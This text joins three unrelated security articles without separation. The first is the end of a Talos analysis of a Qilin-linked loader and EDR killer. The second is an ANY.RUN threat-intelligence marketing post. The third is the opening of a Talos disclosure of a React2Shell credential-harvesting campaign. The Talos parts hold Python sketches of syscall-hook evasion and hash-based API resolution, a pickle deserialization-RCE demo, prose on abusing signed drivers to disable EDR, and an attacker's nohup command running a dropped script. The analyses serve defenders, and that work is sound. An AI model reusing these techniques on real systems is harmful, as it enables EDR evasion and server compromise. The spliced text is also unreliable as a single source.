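The neighbor-scan logic can be modeled in a few lines. This is a simplified illustration of the Halo’s Gate idea, relying on the fact that Nt* stubs are laid out contiguously in ntdll with consecutive syscall numbers; the layout and hook positions below are fabricated:

```python
# Simplified model of Halo's Gate: syscall stubs form a contiguous array
# whose service numbers (SSNs) increase by one per stub, so a hooked
# stub's SSN can be derived from any clean neighbor.

STUB_SIZE = 0x20  # typical spacing of Nt* stubs in ntdll (assumption)

def recover_ssn(stubs, target_idx, is_hooked):
    """stubs: list of (address, ssn); is_hooked(idx) -> bool."""
    if not is_hooked(target_idx):
        return stubs[target_idx][1]
    # Scan outward, backward and forward, for a clean neighbor.
    for dist in range(1, len(stubs)):
        for idx in (target_idx - dist, target_idx + dist):
            if 0 <= idx < len(stubs) and not is_hooked(idx):
                # Neighbor SSN adjusted by the distance gives the target SSN.
                return stubs[idx][1] + (target_idx - idx)
    return None

stubs = [(0x1000 + i * STUB_SIZE, 0x30 + i) for i in range(8)]
hooked = {3, 4}                      # pretend an EDR patched two stubs
ssn = recover_ssn(stubs, 4, lambda i: i in hooked)
```

In the real loader, the recovered SSN is then loaded into eax and executed through a syscall instruction inside a clean neighboring stub, so the hooked bytes themselves are never touched.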
As previously mentioned, the actual code of the malware is more complex (e.g., the aforementioned runtime resolution of ntdll!LdrProtectMrdata).
Figure 10. Resolution of ntdll!LdrProtectMrdata at runtime.
The loader resolves the ntdll!LdrProtectMrdata function in a stealthy way. Instead of resolving it by name or hash, the loader:
Finds the .mrdata section in the “ntdll.dll” image
Checks whether the current dispatcher slot pointer (dispatch_slot) lies inside .mrdata
If it does, it uses a known exported ntdll function (RtlDeleteFunctionTable, located via hash) as an anchor
From that anchor, it scans for a CALL rel32 instruction (0xE8) and extracts its target address
That call target is the address of LdrProtectMrdata and stored in ctx->LdrProtectMrdata
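The anchor-scan step can be sketched as follows. An x86/x64 E8 call stores a signed 32-bit displacement relative to the end of the 5-byte instruction; the buffer contents below are fabricated for illustration:

```python
import struct

# Sketch of the CALL rel32 scan used to locate a function from an anchor:
# find the first 0xE8 opcode and compute its target from the signed
# displacement that follows it.

def find_call_target(code, base_va):
    """Scan for the first 0xE8 opcode and return its call target VA."""
    for i in range(len(code) - 4):
        if code[i] == 0xE8:
            rel32 = struct.unpack_from("<i", code, i + 1)[0]  # signed disp32
            return base_va + i + 5 + rel32   # target = next-instr VA + disp
    return None

# A fake anchor whose third byte starts "call -0x100":
code = bytes([0x90, 0x90]) + b"\xE8" + struct.pack("<i", -0x100)
target = find_call_target(code, 0x7FF0_0000_1000)
```

Note that a naive byte scan like this can false-positive on 0xE8 bytes inside other instructions; the loader presumably mitigates this by starting from a known, stable anchor such as RtlDeleteFunctionTable.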
The initialization routine described earlier also incorporates several basic anti-debugging measures. For example, it verifies whether a breakpoint has been placed on KiUserExceptionDispatcher. If such a breakpoint is detected, the process is deliberately crashed. This check is performed before the dispatcher is overwritten, which means that the resulting exception is handled by the original, default exception handler.
The loader also implements geo-fencing. It excludes systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the loader terminates if a locale from the exclusion list is detected.
Figure 12. Geo-fencing function.
Figure 13. Geo-fencing excluded countries list.
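The check itself amounts to comparing the system language identifier against a blocklist. A minimal sketch, assuming Windows LANGID values for a few locales of the kind described above (the values and list below are illustrative, not the sample’s actual list or API calls):

```python
# Illustrative geo-fencing check. LANGIDs shown: ru-RU (0x419),
# uk-UA (0x422), be-BY (0x423), hy-AM (0x42B), ka-GE (0x437),
# kk-KZ (0x43F). The sample's real list and lookup mechanism differ.

BLOCKED_LANGIDS = {0x419, 0x422, 0x423, 0x42B, 0x437, 0x43F}

def should_run(system_langid):
    """Return False if the system locale is on the exclusion list."""
    return system_langid not in BLOCKED_LANGIDS
```

As the post notes, the loader performs this check early and simply terminates when the locale matches, before any payload is unpacked.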
After initializing Stage 1, the loader proceeds to unpack the subsequent stages. It creates a pagefile-backed section and maps two views of this section into the process address space. This aspect was not analyzed in depth; however, creating two views of the same section is a common malware technique used to obscure a read-write-execute memory region. Typically, one view is configured with write access only, masking the effective executable permissions of the underlying section. This shared memory region will contain the subsequent malware stages after unpacking, and the arrangement also makes it more difficult to dump the memory during analysis. When a virtual memory page is not currently present in RAM (present bit cleared), accessing it triggers a page fault, which the kernel resolves (e.g., by loading the page from the pagefile into physical memory).
Figure 14. CreateFileMappingA resolver function, returns the handle 0x174.
Figure 15. First “write only” view, FILE_MAP_WRITE (0x2).
Figure 16. Second “R-W-X” view, 0x24 = FILE_MAP_READ (0x4) | FILE_MAP_EXECUTE (0x20).
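The dual-view trick can be illustrated with a POSIX analogy. This is a sketch only; the loader itself uses Windows section APIs (CreateFileMappingA/MapViewOfFile with differing FILE_MAP_* flags), but the underlying property is the same: two views of one backing object share pages.

```python
import mmap, tempfile

# POSIX analogy of mapping two views of the same section: bytes written
# through one (write) view are immediately visible through a separate
# (read) view, because both map the same underlying pages.

backing = tempfile.TemporaryFile()
backing.truncate(mmap.PAGESIZE)

write_view = mmap.mmap(backing.fileno(), mmap.PAGESIZE, access=mmap.ACCESS_WRITE)
read_view = mmap.mmap(backing.fileno(), mmap.PAGESIZE, access=mmap.ACCESS_READ)

write_view[:4] = b"\xde\xad\xbe\xef"            # "unpack" through the write view
visible = read_view[:4] == b"\xde\xad\xbe\xef"  # the other view sees the bytes

write_view.close(); read_view.close(); backing.close()
assert visible
```

In the malware’s case the second view additionally carries execute permission, so code written through the write-only view can be run from the other view without the process ever requesting an RWX mapping directly.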
After creating the views, it copies and decodes bytes into this buffer. The basic block highlighted in green marks the start of this routine, while the red basic block represents the final control transfer (see Figure 17) to the decoded payload. The yellow basic block contains the decision logic that determines when execution transitions to the red basic block.
Figure 17. Stage 2 decoding routine.
Inside the red basic block, we have the final jump into the decoded bytes of Stage 2.
Figure 18. Call to Stage 2 in red basic block.
Stage 2
Stage 2 (0x2470000) serves solely as a stealthy transition mechanism to transfer execution to Stage 3. As expected, all addresses referenced from this point onward, such as 0x2470000, may vary between executions of the loader, as they are dynamically allocated at runtime.
The initial part of Stage 2 is straightforward: It decodes the data stored in the memory section and then unmaps the previously mapped view. The subsequent function call constitutes the critical step: ctx->FuncPtrHookIAT((ULONGLONG)ctx->hooking_func);
This IAT-hooking routine overwrites the ExitProcess entry in the Import Address Table (IAT) of the main process (i.e., the process that loaded the malicious “msimg32.dll”).
Figure 21. Overwritten IAT pointer to ExitProcess at 0x140017138.
As shown in Figure 18, execution returns normally from Stage 2, and DllMain completes without any obvious anomalies. The malicious logic is triggered later, when ExitProcess is invoked by exit_or_terminate_process during process termination. Instead of terminating the process, execution is redirected to function 0x2471000, which corresponds to Stage 3.
Stage 3
Stage 3 primarily decompresses and loads a PE image from memory that was originally embedded within the malicious “msimg32.dll”. It begins by resolving syscall stubs, which are used in subsequent code sections; this is followed by decoding routines.
Figure 22. Syscall resolution and execution of certain functions.
After several decoding and preparation steps, the PE image is decompressed from memory.
After the PE image has been decompressed, the final routine responsible for preparing, loading, and ultimately executing the PE can be found at 0x24A2CE7 in this run.
Figure 25. Final load and execution of the embedded PE.
The fix_and_load_PE_set_VEH function begins by mapping “shell32.dll” into the process address space using NtCreateFile, NtCreateSection, and MapViewOfFile. It then overwrites the in-memory contents of “shell32.dll” with the previously loaded PE image.
Figure 26. Load “shell32.dll” into memory.
After copying the embedded and decoded PE image into memory, the code manually applies base relocations.
Figure 27. PE relocation.
After preparing the PE for in-memory execution, the loader employs a technique similar to Stage 2, but this time leveraging a vectored exception handler (VEH). After registering the VEH, it triggers the handler by setting a hardware breakpoint on ntdll!NtOpenSection. To indirectly invoke NtOpenSection, the loader subsequently loads a fake DLL via a call to the LdrLoadDll API. It appears that the malware author intentionally chose a name referencing a well-known security researcher, likely as a provocative touch.
Figure 28. Call to LdrLoadDll.
After several intermediate steps, this results in a call to NtOpenSection, which triggers the previously configured hardware breakpoint and, in turn, invokes the VEH. The first time the VEH is triggered at NtOpenSection, it executes the code in Figure 29.
Figure 29. Malicious VEH, part 1: NtOpenSection handler.
It modifies the “shell32.dll” name in memory to “hasherezade_[redacted].dll”, then adjusts RIP in the context record to point to the next ret instruction (0xC3) within the NtOpenSection stub and sets a new hardware breakpoint on NtMapViewOfSection. In addition, it updates the stack pointer to reference LdrpMinimalMapModule+offset, where the offset corresponds to an instruction immediately following a call to NtOpenSection inside LdrpMinimalMapModule. It then invokes NtContinue, which resumes execution at the RIP value stored in the context record (i.e., at the ret instruction). That ret instruction subsequently transfers control to the address prepared on the stack, namely LdrpMinimalMapModule+offset.
cr_1->rsp = LdrpMinimalMapModule+offset
cr_1->rip = ntdll!NtOpenSection+0x14 = ret  ; jumps to <rsp> when executed
Figure 30. Jump destination after calling NtOpenSection.
During execution of LdrpMinimalMapModule, a call to NtMapViewOfSection is made, which triggers the hardware breakpoint set by the previous routine. On this occasion, the VEH executes the code in Figure 31.
Figure 31. Malicious VEH, part 2: NtMapViewOfSection handler.
It deletes all hardware breakpoints and then sets the stack pointer to an address in LdrpMinimalMapModule+offset. As expected, this is right after a call to NtMapViewOfSection. In other words, the registers in the context are overwritten like this:
ctx->rsp -> ntdll!LdrpMinimalMapModule+0x23b
ctx->rip -> ntdll!NtMapViewOfSection+0x14 = ret
When the return (ret) instruction is reached, it jumps to the address stored in the stack pointer (rsp).
Figure 32. Jump destination after call NtMapViewOfSection.
The subsequent code in LdrpMinimalMapModule maps the previously restored PE image into the process address space and prepares it for execution. Finally, control returns to 0x24A3C1E, the instruction immediately following the call that originally triggered the first hardware breakpoint.
Figure 33. Instruction after the call to LdrLoadDll.
After several additional fix-up steps, the loader transfers execution to Stage 4 (i.e., the loaded PE image).
Figure 34. Final jump to loaded PE.
This PE file is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of solutions. A detailed analysis of this component will be provided in the next section.
Figure 35. Excerpt from the EDR driver list.
PE loader summary
The first three stages of this binary implement a sophisticated and complex PE loader capable of bypassing common EDR solutions by evading user-mode hooks through carefully crafted SEH and VEH techniques. While these methods are not entirely novel, they remain effective and should be detectable by properly implemented EDR solutions.
The loader decrypts and executes an embedded PE payload in memory. In this campaign, the payload is an EDR killer capable of disabling over 300 different EDR products. This component will be analyzed in detail in the next section.
EDR killer
Stage 4: Extracted EDR killer PE file
Besides initialization, the first thing the PE extracted in Stage 3 does is check again whether the system locale matches a list of post-Soviet countries; if it does, it crashes. This repeated check is another indicator that the earlier stages are simply a custom PE loader that could be used to load any PE the adversaries want; otherwise, performing the same check twice would make little sense.
Figure 36. Malware geo-fencing function.
Figure 37. List of blocked countries.
The malware then attempts to elevate its privileges and load a helper driver. This also implies that the process must be executed with administrative privileges.
Figure 38. Privilege escalation and loading of helper driver.
The “rwdrv.sys” driver is a renamed version of “ThrottleStop.sys”, originally distributed by TechPowerUp LLC and signed with a valid digital certificate. It is legitimately used by tools such as GPU-Z and ThrottleStop. This is not the first observed abuse of this driver; it has previously been leveraged in several malware campaigns.
Despite its benign origin, the driver exposes highly powerful functionality and can be loaded by arbitrary user-mode applications. Critically, it implements these capabilities without enforcing meaningful security checks, making it particularly attractive for abuse.
This driver exposes a low-level hardware access interface to user mode via input/output controls (IOCTLs). It allows a user-mode application to directly interact with system hardware.
The driver implements IOCTL handlers that provide the following capabilities:
I/O port access
Read from hardware ports (inb/inw/ind)
Write to hardware ports (outb/outw/outd)
CPU Model Specific Register (MSR) access
Read MSRs (__readmsr)
Write MSRs (__writemsr) with limited protection against modifying critical syscall/sysenter registers
Physical memory/MMIO access
Map arbitrary physical memory into kernel space using MmMapIoSpace
Create a user-mode mapping of the same memory using MmMapLockedPagesSpecifyCache
Maintain up to 256 active mappings per driver instance
Additionally, the driver tracks the number of open handles and associates memory mappings with the calling process ID.
Overall, the driver functions as a generic kernel-mode hardware access layer, exposing primitives for port I/O, MSR access, physical memory mapping, and PCI configuration operations. Such functionality is typically used by hardware diagnostic tools, firmware utilities, or low-level system utilities, but it also provides powerful primitives that could be abused if accessible from unprivileged user-mode.
The two important functions heavily used by the sample are the ability to read and write physical memory.
After loading the driver, the malware proceeds to determine the Windows version. To do so, it first resolves the required API function using a PEB-based lookup routine, a technique consistently employed throughout the sample.
Figure 41. DLL resolution.
Figure 42. API function resolution.
The implementation parses the Process Environment Block (PEB) and locates the target module by matching the hash of its name. The ResolveExportByHash function then takes the module base of the previously located DLL and parses its PE header to find the function corresponding to the given function hash. It can provide the API function address either as a PE offset or as a virtual address.
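The pattern can be sketched as follows. The sample’s actual hash algorithm is not documented in this post; the classic ROR-13 export hash is used below purely to illustrate the technique of comparing hashes instead of storing plaintext API names:

```python
# Illustration of hash-based API resolution. ROR-13 over the ASCII name
# is an assumption shown only as a well-known example of the pattern;
# the sample's real hash function may differ.

def ror32(value, count):
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h

def resolve_export_by_hash(exports, wanted_hash):
    """exports: mapping of export name -> address (e.g., parsed from a PE)."""
    for name, addr in exports.items():
        if ror13_hash(name) == wanted_hash:
            return addr
    return None

# Fabricated export table:
exports = {"NtOpenSection": 0x7FF800001000, "NtClose": 0x7FF800001040}
target = ror13_hash("NtClose")   # the malware would ship this precomputed
addr = resolve_export_by_hash(exports, target)
```

Because only hashes appear in the binary, static string scans for API names come up empty, which is why this lookup style recurs throughout the sample.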
After a couple of initializations and checks, it gets the “rwdrv.sys” handle, followed by the EDR-related part of the sample — the kernel tricks which are responsible for avoiding, blinding, and disabling the EDR.
Figure 43. Get driver handle for “rwdrv.sys”.
Figure 44. Overview of the EDR killer part of the sample.
Let’s have a brief look at the details. It starts by building a vector of physical memory pages, which will later be used in subsequent methods.
Figure 45. Initialization logic of the Page Frame Number (PFN) metadata list.
The SetMemLayoutPointer function in the if statement above leverages the NtQuerySystemInformation API function to gather Superfetch information about the physical memory pages. It stores a pointer to this information in a global variable (mem_layout_v1_ptr or mem_layout_v2_ptr); which one is used depends on the version argument passed to the function. In our case, 1 is used for the first call and 2 for the second. In other words, it brute-forces whichever version works on the Windows system it is running on.
Figure 46. Superfetch structure and NtQuerySystemInformation call.
The BuildSuperfetchPfnMetadataList function is quite large and complex. Simplified, it starts by using the mem_layout pointer to calculate the total page count.
Figure 47. Total Page count algorithm.
It then uses NtQuerySystemInformation again to retrieve the physical pages and their metadata, storing this information in a global vector (g_PfnVector).
Figure 48. Superfetch structure.
Figure 49. Build global physical memory list vector.
Returning to the block above, the next step blinds the EDRs by deleting their callbacks for certain operations (e.g., process creation, thread creation, and image loading events).
Figure 50. Deleting EDR callbacks.
The unregister_callbacks function iterates through a list of over 300 driver names which are stored in the sample.
Figure 51. EDR driver name list.
Figure 52. unregister_callbacks function.
This function also demonstrates the overall implementation pattern of the malware, which recurs in several other functions. It uses a known API function to calculate an offset to the function or object it actually targets, in this case the kernel callback cng!CngCreateProcessNotifyRoutine. It does not touch this object in the process's virtual address space; instead, it uses the previously loaded driver (“rwdrv.sys”) to obtain the object's physical memory address. The read logic and driver communication are implemented in the read_phy_bytes function, and memory overwrites are handled the same way by the write_to_phy_mem function. The DeviceIoControlImplementation function, which talks to the driver, is called from write_to_phy_mem.
Figure 53. DeviceIoControlImplementation function called in write_to_phy_mem.
The other callback-related functions shown in Figure 44 work similarly to the one we discussed. They overwrite or unregister other EDR-specific callbacks, which were set by the EDR Mini-Filter driver.
The final part of the EDR killer begins by loading another driver (“hlpdrv.sys”).
Figure 54. Load and use of hlpdrv.sys.
The malware uses the driver to terminate EDR processes running on the system using the IOCTL code 0x2222008. This executes the function in the driver which is responsible for unprotecting and terminating the process.
Figure 55. Terminate protected process function in hlpdrv.sys.
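When analyzing driver interfaces like this, it is useful to decompose the IOCTL value according to the standard Windows CTL_CODE encoding, CTL_CODE(DeviceType, Function, Method, Access) = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. A quick generic decode (not code from the sample):

```python
# Decompose an IOCTL per the standard Windows CTL_CODE bit layout.

def decode_ioctl(code):
    return {
        "device_type": code >> 16,
        "access": (code >> 14) & 0x3,       # 0 = FILE_ANY_ACCESS
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,               # 0 = METHOD_BUFFERED
    }

fields = decode_ioctl(0x2222008)
# -> device type 0x222, function 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS
```

Decoding 0x2222008 this way yields device type 0x222 with function 0x802, a custom (non-standard) device type typical of third-party helper drivers.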
Once terminated, EDR processes such as Windows Defender no longer run, as demonstrated in Figure 56.
Figure 56. Terminated Windows Defender process.
Additionally, it restores the CiValidateImageHeader callback. The RestoreCiValidateImageHeaderCallback function is shown in Figure 57.
Figure 57. Restoring code integrity checks.
This is accomplished using the same concept we previously saw in Figure 52:
Resolve a known API function.
Use this function as an anchor point to locate a specific instruction within its code.
This instruction contains a pointer in one of its operands that points to, or near, the object of interest.
Identify the pointer to the target object within that instruction.
Perform a sign extension on the operand.
Add an additional offset to compute the final address of the object being sought — in this case, the CiValidateImageHeader callback.
Restore the original function pointer to CiValidateImageHeader.
Note that the malware had previously overwritten the callback to CiValidateImageHeader with the address of ArbPreprocessEntry, a function that always returns true. In other words, it has now restored the original Code Integrity check.
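Steps 2 through 6 above boil down to standard x64 RIP-relative address arithmetic. A minimal sketch, with fabricated instruction bytes and offsets (the actual anchor instruction and offsets used by the sample are not reproduced here):

```python
import struct

# Sketch of steps 2-6: extract the signed disp32 from a RIP-relative x64
# instruction (here "lea rax, [rip+disp32]", opcode 48 8D 05), sign-extend
# it, and add a further offset to reach the object of interest.

def rip_relative_target(instr_bytes, instr_va, disp_offset, extra_offset=0):
    disp = struct.unpack_from("<i", instr_bytes, disp_offset)[0]  # sign extension
    next_instr = instr_va + len(instr_bytes)   # RIP points past the instruction
    return next_instr + disp + extra_offset

# Fabricated example: "lea rax, [rip - 0x2000]" at VA 0x140001000, with an
# additional 0x18-byte offset to the sought object:
instr = b"\x48\x8D\x05" + struct.pack("<i", -0x2000)
target = rip_relative_target(instr, 0x140001000, 3, extra_offset=0x18)
```

The restore itself is then a single physical-memory write of the saved original pointer, performed through “rwdrv.sys” as before.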
Summary
This blog provided a technical deep dive into the infection chain hidden in the malicious “msimg32.dll”, which has been observed during Qilin ransomware attacks. It demonstrates the sophisticated tricks the malware employs to circumvent or completely disable modern EDR protection features on compromised systems.
It is encouraging to see how many hurdles modern malware must overcome. At the same time, this highlights that even state-of-the-art defense mechanisms can still be bypassed by determined adversaries. Defenders should never rely on a single product for protection; instead, Talos strongly recommends a multi-layered security approach. This significantly increases the difficulty for attackers to remain undetected, even if they manage to evade one line of defense.
Coverage
The following ClamAV signatures detect and block this threat:
Win.Malware.Bumblebee-10056548-0
Win.Tool.EdrKiller-10059833-0
Win.Tool.ThrottleStop-10059849-0
The following SNORT® rules (SIDs) detect and block this threat:
Covering Snort2 SID(s): 1:66181, 1:66180
Covering Snort3 SID(s): 1:301456
Indicators of compromise (IOCs)
The IOCs for this threat are also available at our GitHub repository here.
Reaching a higher level of SOC maturity takes better, more consistent decision-making during malware and phishing investigation.
This requires a shift in how threat intelligence is used: not as a reference point, but as a core layer in the decision process.
Moving from reactive to confidently proactive security means establishing a threat intelligence workflow that:
Solves key challenges, from alert fatigue to blind spots
Integrates across SOC workflows, supporting them
Delivers compounding value as a unified system
In this model, threat intelligence becomes part of the SOC’s operational fabric. That’s what ANY.RUN Threat Intelligence is designed for.
It becomes a layer inside your SOC’s operations. A layer that provides behavioral context, workflow support, and data delivery for faster triage, incident response, and threat hunting.
Read further to see how it changes each stage of your SOC operations.
Key takeaways
Threat intelligence must move from data to decisions, as its value is measured by how it improves SOC actions, not how much data it provides.
Context is the differentiator. Linking IOCs to behavior and TTPs is what enables accurate triage and detection.
Unified TI drives consistency in SOC teams, embedding intelligence across workflows.
Operationalized TI compounds over time. Every investigation strengthens detection, automation, and future response.
ANY.RUN’s threat intelligence is built on live attack data that provides unique, real-time visibility into emerging threats and supports the full investigation cycle.
Solving Key SOC Challenges with Behavioral TI
Most threat intelligence today is still delivered as bare indicator feeds, standalone reports, or enrichment tools with fragmented intelligence that exists outside the core SOC workflow.
In this model, threat intelligence behaves as an input, not as part of the system itself. Indicators without context create noise. Context without operationalization creates friction. As a direct outcome, SOCs struggle with:
Time-consuming manual enrichment
Operational bottlenecks across processes
Delayed detection caused by a lack of fresh data
Human-centered challenges in SOC teams are often not analysts’ fault either. Alert fatigue and unnecessary escalations stem from fragmented, hard-to-access threat data that fails to deliver usable context during investigations.
The path to improvement lies in acquiring actionable threat intelligence that operationalizes SOC tasks and completes the workflow, supporting the entire investigation cycle.
Reach a higher level of SOC maturity
Behavioral threat intelligence for proactive action
Threat Intelligence That Offers More than Just Indicators
What SOC teams require is actionable intelligence that supports decisions and execution, enabling analysts to move from enrichment to understanding, and from understanding to detection and rapid response.
Where traditional TI may fail because of its fragmented, add-on nature, actionable threat intelligence encompasses the entire malware and phishing investigation cycle by:
Supporting both automation and analyst-driven workflows
This is threat intelligence that doesn’t sit beside your SOC but acts as an essential operational layer within it, turning repetitive work into a scalable workflow in which each detection strengthens overall security and proactive protection against similar threats in the future.
A key differentiator of effective threat intelligence is its foundation in live, real-world attack activity.
ANY.RUN Threat Intelligence is built on continuously analyzed data from over 15,000 organizations and 600,000 analysts conducting daily malware and phishing investigations worldwide. This creates a unique, constantly evolving dataset of active threats processed and validated to minimize noise.
Operational Impact of Actionable Threat Intelligence
For analysts
Less manual work, faster understanding of threats, confident decisions during triage and investigation
For SOC leaders
Improved detection quality, reduced dwell time; consistent, predictable operations across teams
For CISOs
Lower risk exposure, better visibility into threats and coverage gaps; stronger confidence in security effectiveness and ROI
ANY.RUN’s TI As an Operational Layer in Your SOC
ANY.RUN’s approach to behavioral threat intelligence is built around the idea of treating it not as a dataset but as an operational layer that connects context and action across the SOC lifecycle.
This approach reframes TI from a passive resource into an active component of the SOC system that:
1. Links Isolated IOCs to malware behavior and TTPs via TI Lookup
Instead of treating indicators as isolated data points, analysts using Threat Intelligence Lookup (TI Lookup), a solution for instant enrichment and threat research, immediately see how those indicators behave in real attacks. Any artifact (IP, domain, hash, or URL) is enriched with execution context, infrastructure relationships, and associated TTPs.
This allows teams to move from “what is this?” to “how does this operate?” within seconds, improving triage quality and enabling faster, more confident decisions.
IP identified as Moonrise RAT infrastructure, enriched with linked behavioral analyses and attack context. TI Lookup
Turn intelligence into action
Make confident decisions with ANY.RUN’s TI
2. Embeds context directly into triage and response
Integration opportunities for ANY.RUN Threat Intelligence
Whether through integrations or manual use, threat intelligence from ANY.RUN becomes a part of the SOC investigation cycle that supports early detection and smart decisions.
3. Enables conversion of intelligence into detections via YARA Search
YARA Search accumulating artifacts and sandbox analyses
Threat intelligence becomes particularly valuable when it directly translates into detections. YARA Search enables that by helping analysts test, refine, validate, and create YARA rules to ensure coverage of relevant threats with reduced false positives.
The result is more reliable detections and greater confidence in security controls.
4. Delivers continuous, real-time intelligence streams via TI Feeds
TI Feeds streamline operations with 99% unique threat data
Threat Intelligence Feeds are delivered continuously into existing security pipelines rather than accessed on demand: real-time, validated indicators sourced from live attack data flow directly into SIEM, SOAR, and EDR systems, supporting automated detection, correlation, and response.
This reduces manual workload, improves alert quality, and lowers dwell time.
5. Fills visibility gaps with TI Reports
TI Reports, a module of ANY.RUN’s Threat Intelligence
ANY.RUN TI Reports address the partial visibility challenge in SOC teams by providing threat overviews curated by our experts, turning analyst-driven insights into strategic intelligence with threat behaviors, TTPs, and detection opportunities already described and contextualized.
This enables teams to quickly understand emerging risks, validate their coverage, and identify blind spots without investing additional investigation time.
Threat Intelligence Across Processes and Outcomes
ANY.RUN Threat Intelligence’s goal is not to improve a single step, but to encompass the entire operational cycle.
SOC Process
ANY.RUN’s Threat Intelligence Action
Outcomes
Triage and Alert Enrichment
Centralized validation of indicators with immediate context and prioritization; scalability for teams of any size and secure integration
Threat Hunting and Detection Engineering
Behavior-driven search with access to real attack data and analyses; supports conversion of findings into detections
Proactive threat discovery, stronger and more consistent detections, elimination of repetitive work
Incident Response
Immediate access to unified threat context across incidents, enabling consistent investigation and decision-making
Faster response, reduced dwell time, lower operational risk
SOC Management & Performance
Continuous, real-time intelligence aligned with current threats; visibility into threat landscape and coverage gaps
Improved MTTD/MTTR, measurable SOC performance, clearer ROI, and risk reduction
Conclusion
High-performing SOCs are defined by how effectively threat intelligence is integrated into their operations.
When threat intelligence components operate as a unified system rather than isolated capabilities, they stop being tools and become part of the SOC’s operational infrastructure.
In this model, Threat Intelligence is:
a unified, behavior-driven intelligence layer;
a continuous link from indicators to behavior and from detection to automation;
a real-time stream of relevant, active threat data;
embedded across triage, incident response, threat hunting, detection, and management.
About ANY.RUN
ANY.RUN provides interactive malware analysis and behavior-driven threat intelligence solutions designed to support real-world SOC operations. The platform enables security teams to understand threats faster, make informed decisions, and operationalize intelligence across detection and response workflows.
Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN delivers continuously updated intelligence based on live attack analysis. The company is SOC 2 Type II certified, ensuring strong security controls and protection of customer data.
FAQ
What is ANY.RUN Threat Intelligence?
ANY.RUN Threat Intelligence features TI Lookup, TI Feeds, TI Reports, and YARA Search as a unified, behavior-driven intelligence layer that connects indicators with malware behavior, TTPs, and artifacts—supporting decision-making across SOC workflows.
How is it different from traditional threat intelligence?
Traditional feeds primarily deliver indicators. ANY.RUN’s TI provides context, behavioral analysis, and enables conversion into detections, while continuously integrating into SOC processes.
What data is it based on?
It is built on real-time analysis data from over 15,000 organizations and 600,000 analysts conducting malware and phishing investigations worldwide.
How does it improve SOC operations?
By reducing manual enrichment, accelerating triage and response, improving detection quality, and enabling more consistent, data-driven decisions.
Does it support both manual and automated workflows?
Yes. It is designed to be used both manually by analysts and automatically via integrations with SIEM, SOAR, EDR, and other platforms.
How does it help reduce risk?
By providing early visibility into emerging threats, improving detection coverage, and shortening the time between threat emergence and response.
From Reactive to Proactive: 5 Steps to SOC Maturity with Threat Intelligence (published 2026-04-02)
Cisco Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we are tracking as “UAT-10608.”
Post-compromise, UAT-10608 leverages automated scripts to extract and exfiltrate credentials from a variety of applications, which are then posted to its command and control (C2) server.
The C2 hosts a web-based graphical user interface (GUI) titled “NEXUS Listener” that can be used to view stolen information and gain analytical insights using precompiled statistics on credentials harvested and hosts compromised.
Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we currently track as UAT-10608. The campaign primarily leverages a collection framework dubbed “NEXUS Listener.” This systematic exploitation and exfiltration campaign has resulted in the compromise of at least 766 hosts as of the time of writing, across multiple geographic regions and cloud providers. The operation targets Next.js applications vulnerable to React2Shell (CVE-2025-55182) for initial access, then deploys a multi-phase tool that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale.
The breadth of the victim set and the indiscriminate targeting pattern are consistent with automated scanning, likely based on host profile data from services like Shodan or Censys, or on custom scanners that enumerate publicly reachable Next.js deployments and probe them for the described React configuration vulnerabilities.
The core component of the framework is a web application that makes all of the exfiltrated data available to the operator in a graphical interface that includes in-depth statistics and search capabilities to allow them to sift through the compromised data.
This post details the campaign’s methodology, tools, breadth and sensitivity of the exposed data, and the implications for organizations impacted by this activity.
This analysis is based on data collected for security research purposes. Specific credentials and victim identifiers have been withheld from this publication. Talos has informed service providers of exposed and at-risk credentials and is working with industry partners such as GitHub and AWS to quarantine credentials and inform victims.
Compromised hosts: 766
Hosts with database credentials: ~701 (91.5%)
Hosts with SSH private keys: ~599 (78.2%)
Hosts with AWS credentials: ~196 (25.6%)
Hosts with shell command history: ~245 (32.0%)
Hosts with live Stripe API keys: ~87 (11.4%)
Hosts with GitHub tokens: ~66 (8.6%)
Total files collected: 10,120
Initial access
UAT-10608 targets public-facing web applications using components, predominantly Next.js, that are vulnerable to CVE-2025-55182, broadly referred to as “React2Shell.”
React2Shell is a pre-authentication remote code execution (RCE) vulnerability in React Server Components (RSC). RSCs expose Server Function endpoints that accept serialized data from clients. The affected code deserializes payloads from inbound HTTP requests to these endpoints without adequate validation or sanitization.
Exploitation steps
An attacker identifies a publicly accessible application using a vulnerable version of RSCs or a framework built on top of it (e.g., Next.js).
The attacker crafts a malicious serialized payload designed to abuse the deserialization routine — a technique commonly used to trigger arbitrary object instantiation or method invocation on the server.
The payload is sent via an HTTP request directly to a Server Function endpoint. No authentication is required.
The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side Node.js process.
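React2Shell itself is a JavaScript flaw, but the underlying bug class is language-agnostic. As a benign illustration (not the actual exploit), the following Python sketch uses pickle, whose `__reduce__` hook plays the same role as the abused RSC deserialization routine: the serialized bytes themselves name a callable that the server invokes on load.

```python
import pickle

# Benign stand-in for "attacker code ran on the server."
log = []

def attacker_action(marker):
    log.append(marker)

class MaliciousPayload:
    # __reduce__ tells pickle which callable to invoke when the bytes are
    # deserialized -- a real exploit would point at os.system or similar.
    def __reduce__(self):
        return (attacker_action, ("arbitrary code executed",))

# What the attacker sends over the wire:
wire_bytes = pickle.dumps(MaliciousPayload())

# A vulnerable endpoint that blindly deserializes an inbound request body:
pickle.loads(wire_bytes)

print(log)  # the attacker's callable already ran during deserialization
```

The takeaway mirrors the React2Shell steps above: no authentication, no follow-up interaction; the act of deserializing the payload is itself the code execution.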
Once the threat actor identifies a vulnerable endpoint, the automated toolkit takes over. No further manual interaction is required to extract and exfiltrate credentials harvested from the system.
Automated harvesting script
Data is collected via nohup-executed shell scripts dropped in /tmp with randomized names:
/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh >/dev/null 2>&1
